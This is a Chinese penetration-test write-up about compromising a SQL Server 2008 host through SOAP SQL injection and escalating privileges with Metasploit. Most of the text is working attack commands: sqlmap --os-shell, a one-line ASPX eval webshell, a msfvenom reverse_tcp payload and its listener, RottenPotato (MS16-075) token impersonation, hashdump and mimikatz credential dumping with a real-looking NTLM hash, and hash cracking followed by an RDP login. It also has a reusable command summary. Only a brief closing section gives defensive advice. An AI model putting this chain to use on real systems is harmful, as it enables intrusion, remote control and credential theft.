soap注入某sql2008服务器结合msf进行提权

图12获取IP地址

6. 获取webshell测试

（1）生成 shell 文件

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx

如图13所示，回显结果显示1，无其它信息，表面生成文件命令成功。

图13生成webshell

（2）获取webshell   使用中国菜刀后门管理工具，创建记录http://1**.***.***.***/cmd.aspx，一句话后门密码：pass，如图14所示，连接成功，成功获取webshell。

图14获取webshell

1 .1.4 常规方法提权失败

systeminfo > SYD1-0081DSB.txt

2.下载Windows-Exploit-Suggester程序Windows-Exploit-Suggester下载地址：https://github.com/GDSSecurity/Windows-Exploit-Suggester/

3.更新漏洞库并进行漏洞比对在 python 中执行windows-exploit-suggester.py -u进行更新，同时对漏洞库进行比对：windows-exploit-suggester.py  --audit -l --database 2018-06-04-mssb.xls --systeminfo SYD1-0081DSB.txt > SYD1-0081DSB-day.txt，如图15所示。

图15进行漏洞比对

4.查看漏洞情况在C:\Python27目录打开SYD1-0081DSB-day.txt文件，如图16所示，可以看到程序判断该操作系统为windows 2008 R2版本，且存在多个漏洞，最新漏洞为ms16-075。

图16查看漏洞情况

5.对存在的漏洞进行提权测试按照漏洞编号，查找并整理exp文件，在目标服务器上进行提权测试，除ms16-075exp外，测试均失败，无法提权。

1.使用msf生成反弹木马

在msf下面执行命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

其中windows/meterpreter/reverse_tcp反弹端口类型，lhost是反弹连接的服务器Ip地址，注意该ip地址必须是独立服务器，或者必须是外网端口映射，换句话说，就是反弹必须能够接收，lport为反弹的端口，4433为生成的程序。

2.在监听服务器上执行监听命令

（1）启动msf

msfconsole

（2）配置meterpreter参数

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.33

set LPORT 4433

exploit

图17获取系统信息

5.使用meterpreter自带提权功能失败

在meterpreter中分别执行getuid和getsystem命令，如图18所示，未能成功提权。

（1）ms16-075可利用exp下载 https://github.com/foxglovesec/RottenPotato

（2）上传potato文件

通过webshell上传potato.exe文件，或者在msf下面执行命令上传：upload  /root/potato.exe

（3）获取系统权限依次执行以下命令：

use incognitolist_tokens -uexecute -cH -f ./potato.exelist_tokens -u

impersonate_token "NT AUTHORITY\\SYSTEM"getuid

图20获取系统权限

（5）获取密码

在meterpreter下执行命令：run hashdump命令，如图21所示，成功获取该服务器密码哈希值：Administrator:500:aad3b435b51404eeaad3b435b51404ee:a59a64a645487c1581dea603253c7920:::

图21获取密码

在本例中还是用load mimikatz进行明文密码获取，但获取效果不理想，执行命令：kerberos、livessp、msv、ssp、tspkg、wdigest获取不到明文密码，还可以执行命令mimikatz_command，进入mimikatz命令提示符下进行操作。

（6）破解ntml密码将ntml密码哈希值a59a64a645487c1581dea603253c7920复制到cmd5.com进行破解，cmd5需要付费，还可以到： http://www.objectif-securite.ch/en/ophcrack.php 和https://www.somd5.com/网站进行密码破解，如图22所示，成功破解密码。

图22破解ntlm哈希值

7.登录服务器   通过nmap -sS -Pn -A 1**.***.***.***或者masscan -p 1-65535 1**.***.***.***进行端口扫描，发现该服务器开放3389端口，使用mstsc进行登录，如图23所示，成功登录该服务器。

图23成功登录服务器

1 .1.6总结与防御

1.本次渗透主要命令汇总

（1）sqlmap执行命令

sqlmap.py -r 1**.***.***.***.txt
sqlmap.py -r 1**.***.***.***.txt --is-db
sqlmap.py -r 1**.***.***.***.txt --password --batch
sqlmap.py -r 1**.***.***.***.txt --os-shell

（2）os-shell下执行命令

ipconfigdir c:/echo "thisis test">e:\software\AMS_NoFlow\t.txtecho ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx

（3）msf下执行命令生成反弹木马：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

（4）msf启动及监听

msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.33（实际为外网IP地址）set LPORT 4433exploit

（5）ms16-075提权命令

use incognitolist_tokens -uexecute -cH -f ./potato.exelist_tokens -u impersonate_token "NT AUTHORITY\\SYSTEM"getuid

（6）获取密码run hashdump

load mimikatzkerberos、livessp、msv、ssp、tspkg、wdigest（逐个命令测试，有的会显示明文密码）mimikatz_command：mimikatz命令提示窗口

privilege::debugsekurlsa::logonpasswords

2.渗透总结  

在本次渗透中，通过sqlmap进行soap注入测试，通过sqlmap判断sql注入点可用，后续通过os-shell成功获取了webshell。获取webshell后，尝试通过常规的Nday提权方法，结果失败，后续通过msf配合进行ms16-075进行提权。Windows-Exploit-Suggester进行本地漏洞的判断和测试效果还是可以的，通过其审计，使用最新漏洞进行提权，基本命中率在99%。

3.安全防御   

成功 渗透该服务器后，在该服务器上未发现有任何安全防护软件，笔者 根据经验，建议做如下安全防御：

（1）对soap参数进行过滤，过滤危险的一些导致sql注入的参数。

（2）mssql数据库使用低权限用户进行数据库连接。

（3）服务器定期进行补丁更新升级。

（4）安装杀毒软件、waf及硬件防火墙，增加攻击成本和难度